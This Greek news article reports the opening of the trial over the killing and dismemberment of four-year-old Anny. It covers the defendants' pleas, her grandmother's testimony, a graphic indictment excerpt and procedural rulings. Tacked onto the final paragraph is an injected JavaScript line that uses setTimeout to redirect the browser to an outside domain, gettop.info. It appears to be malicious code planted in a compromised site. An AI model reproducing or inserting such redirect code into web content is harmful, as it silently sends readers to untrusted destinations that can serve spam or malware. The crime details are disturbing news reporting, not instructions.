Φρικιαστική ομολογία από τον πατέρα της Άννυ: Τεμάχισα το παιδί μου

0
15

 

Ξεκίνησε σήμερα στο Μικτό Ορκωτό Δικαστήριο η δίκη για τη φρικτή δολοφονία της 4χρονης Άννυ από τον πατέρα της.

Όταν ο Στανισλάβ Μπακαρτζίεβ, γνωστός ως Σάββας, κλήθηκε από το δικαστήριο να απαντήσει αν αποδέχεται τις κατηγορίες αρνήθηκε ότι σκότωσε το παιδί του ωστόσο παραδέχτηκε πως το τεμάχισε και επιφυλάχθηκε να πει περισσότερα κατά τη διάρκεια της απολογίας του.

Ο κατηγορούμενος «έδειξε» εμμέσως προς τον συγκατηγορούμενο του Νικολάι ή Νίκι, ο οποίος με τη σειρά του αρνήθηκε οποιαδήποτε εμπλοκή του στη δολοφονία.

Η μητέρα της Άννυ Δημητρίνα Μπορίσοβα, όταν κλήθηκε από το δικαστήριο, είπε πως αποδέχεται ότι έχει διαπράξει μόνο το αδίκημα της ψευδορκίας λέγοντας χαρακτηριστικά πως θα εξηγήσει αργότερα τους λόγους.

Στο βήμα του μάρτυρα ανέβηκε η μητέρα της Δημητρίνα Μπορίσοβα και γιαγιά της Άννυ.

«Η κόρη μου δεν έχει ενοχή . Σε αυτή την υπόθεση ευθύνονται οι δυο κατηγορούμενοι. Πονάω παρά πολυ για την εγγονή μου. Δεν μου αρέσει που η κόρη μου είναι έγκλειστη» είπε.

Αναφερόμενη στη γνωριμία της κόρης της με τον Σάββα υποστήριξε πως ήταν 18 ετών όταν ήρθε στην Ελλάδα έμεινε έγκυος και επέστρεψε στην Βουλγαρία. «Η Άννυ γεννήθηκε την 1η Σεπτεμβρίου του 2011 στη Βουλγαρία. Η Άννυ έμενε μαζί μας στη Βουλγαρία και η Δημητρίνα είχε μεγάλη αγάπη στο παιδί. Δεν μπορούσα να φανταστώ ότι θα συμβεί κάτι κακό γιατί στη Βουλγαρία έδειχναν να αγαπούν το παιδί».

Η μάρτυρας κατονόμασε έναν άνδρα από τη Γερμανία ο οποίος έστελνε, όπως είπε, χρήματα στην κόρη της με τα οποία ζούσαν.

«Δεν είχαμε αντιληφθεί ότι έκαναν χρήση ναρκωτικών. Ήταν μια χαρά, έβγαινε, οδηγούσε…» ανέφερε η μάρτυρας.

Ακολούθησε σειρά ερωτήσεων από τον πρόεδρο για τον πατέρα του παιδιού. Όπως τόνισε η γυναίκα ο Μπακαρτζιεβ μπροστά της φερόταν καλά στο παιδί ενώ η συμπριφορά της κόρης της επίσης ήταν πολύ καλή καθώς έβγαιναν κι έπαιζαν.

Αναφέρθηκε και στη σχέση του ζευγαριού λέγοντας πως «εκείνος έβλεπε τηλεόραση και εκείνη κατσούφιαζε«.

Όπως αποκάλυψε η κόρη της θα έφευγε για τη Γερμανία με την κόρη της να ζήσει με τον άνδρα που της έστελνε χρήματα για να ζήσουν.

Στην ερώτηση αν θα ανησυχούσε αν μάθαινε πως το παιδί είχε μείνει μόνο με τον κατηγορούμενο, είπε: «Θα έπαιρνα εισιτήριο για να έρθω. Όλους αυτούς τους μήνες είχα ακούσει μόνο μια φορά το παιδί στο τηλέφωνο«.

Όσο για το πώς πληροφορήθηκε για την εξαφάνιση του παιδιού: «Είδα την κόρη μου στην τηλεόραση να αναζητά το παιδί της και μετά με πήραν από την Ελλάδα και μου είπαν όλη την αλήθεια».

Η ανάγνωση του κατηγορητηρίου προκάλεσε φρίκη σε όσους παρακολουθούσαν τη δίκη. Για τους δυο κατηγορούμενους άνδρες αναφέρει μεταξύ άλλων πως: «Σε υπόγειο διαμέρισμα όπου διέμεναν από κοινού, ενεργώντας μαζί και με έτερο άγνωστο δράστη, με τη χρήση μαχαιριού κουζίνας τεμάχισαν το σώμα του ανήλικου βιολογικού τέκνου του πρώτου κατηγορουμένου (σ.σ.: Μπακαρτζίεβ), το οποίο είχαν προηγουμένως σκοτώσει και (…) τοποθέτησαν τα παραπάνω σε πλαστικές σακούλες, τις οποίες επέρριψαν εν συνεχεία σε κάδους απορριμμάτων».

Στο σημείο αυτό ο συνήγορος υπεράσπισης της Δημητρίνα Μπορίσοβα, Σταύρος Γεωργίου , επικαλούμενος το μεγάλο ενδιαφέρον που υπάρχει για την υπόθεση, αιτήθηκε τη μεταφορά της δίκης σε μεγαλύτερη αίθουσα στα δικαστήρια της Ευελπίδων. Ο πρόεδρος του δικαστηρίου επιφυλάχθηκε να εξετάσει το αίτημα.

Επιπλέον, ο συνήγορος υπεράσπισης υπέβαλε αίτηση εξαίρεσης της εισαγγελέως επικαλούμενος «προηγούμενα» από άλλη δίκη. Ο συνήγορος είπε πως θα ήθελε να δοθούν αμοιβαίες εξηγήσεις. «Δεν έχω να πω τίποτα» απάντησε η εισαγγελέας.

Απορρίφθηκε η ένσταση για τη μετάφραση του βουλεύματος

Νωρίτερα και έπειτα από σύντομη διακοπή η εισαγγελέας της έδρας απαντώντας στην ένσταση που υπέβαλε ο τέταρτος κατηγορούμενος σχετικά με τη μη μετάφραση του παραπεμπτικού βούλευματος στα βουλγαρικά είπε πως αυτός ο ισχυρισμός δεν ανταποκρίνεται στην πραγματικότητα. » Το βούλευμα έχει μεταφραστεί και επιδοθεί στον κατηγορούμενο. Δεν προσβάλλεται κανένα έννομο συμφέρον» του είπε η εισαγγελική λειτουργός προτείνοντας να απορριφθεί η ένσταση.

«Για την υπόθεση της Siemens το δικαστήριο δέχτηκε το ανάλογο αίτημα» απάντησε η συνήγορος υπεράσπισης του 30χρονου Νασίφ Αχμέντοφ ή Νικολάι υπογραμμίζοντας πως δεν έχει μεταφραστεί ο κατάλογος των αναγνωστέων εγγράφων.

Οι συνήγοροι υπεράσπισης των συγκατηγορουμένων του 30χρονου συντάχθηκαν με την άποψη της εισαγγελέως κατηγορώντας τον για παρελκυστική τακτική.

Το δικαστήριο απέρριψε, ομόφωνα, την ένσταση του κατηγορουμένου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here